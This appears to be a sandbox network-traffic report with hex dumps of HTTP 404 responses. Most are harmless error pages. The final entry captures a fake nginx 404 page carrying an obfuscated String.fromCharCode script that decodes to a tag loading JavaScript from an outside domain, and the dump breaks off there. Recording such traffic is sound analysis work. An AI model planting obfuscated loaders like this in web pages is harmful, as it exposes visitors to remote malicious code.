            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:08:58 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:01 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:03 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:06 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K67qqacxrmcQWwlBPTWGXMxK%2Fvm08k3z7Z3YbtZ8Oq5ZTwLOUcoO0tKk9rUIoExzQeXLj%2FJHx%2BySst3AWVOVWffHX%2FzldCzkIFW7ybHTqSTTMAooQTGzlAO4Z72%2FEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76c4463cdae76a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1330&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=780&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U6FDrURNnh%2BiPQaqhsBqzABoQ4AuGqTheNnXerAYfIcQa8QedIoQx%2B8CWJaEd4aJOf6wXw7mKNjrAO7d3fneeF9b4s49V98vq9MyIysOQtif2%2FJI%2FskDdn7PubqPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76c4562856474c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=800&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW5Y%2BtdrBNn0eCSRxXwz5fNrePCN8Ku0WDxlCdytp%2BM8eAHlk%2Be2fKMj8x7xg72%2Fw4CuRxZHQtM8LQzhOTsDqvSHB5IPmj6AO37SV7cmVjVniXVZXjb2E4uzp27Nzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76c465f8b88c56-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1441&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10882&delivery_rate=0&cwnd=133&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 03:09:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxXELJguHuA8U6BWE2fDzZO9OKb4o4v4ACi946djCpWWTlsQDk2wBNCbyPLHvExBjPriVkj5%2F2CKJcANSEng4PryUwkwlB%2B4McS%2BrwKk7WQyLCb7bKq93%2FCuUQ%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76c475eda82c93-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=526&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 35 35 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 78 74 20 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 30 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 32 2c 20 31 30 38 2c 20 39 37 2c 20 31 31 30 2c 20 31 30 33 2c 20 31 31 37 2c 20 39 37 2c 20 31 30 33 2c 20 31 30 31 2c 20 36 31 2c 20 33 34 2c 31 30 36 2c 20 39 37 2c 20 31 31 38 2c 20 39 37 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 34 2c 20 33 32 2c 20 31 31 35 2c 20 31 31 34 2c 20 39 39 2c 20 36 31 2c 20 33 34 2c 31 30 34 2c 20 31 31 36 2c 20 31 31 36 2c 20 31 31 32 2c 20 31 31 35 2c 20 35 38 2c 20 34 37 2c 20 34 37 2c 20 31 31 35 2c 20 31 31 31 2c 20 34 36 2c 20 35 35 2c 20 35 36 2c 20 35 37 2c 20 31 32 31 2c 20 31 32 31 2c 20 31 30 30 2c 31 31 35 2c 20 34 36 2c 20 31 30 35 2c 20 39 39 2c 20 31 31 37 2c 20 34 37 2c 20 31 30 36 2c 20 31 31 35 2c 20 34 37 2c 20 31 30 36 2c 20 31 31 35 2c 20 34 35 2c 20 31 Data Ascii: 255<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body><script>var xt = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 108, 97, 110, 103, 117, 97, 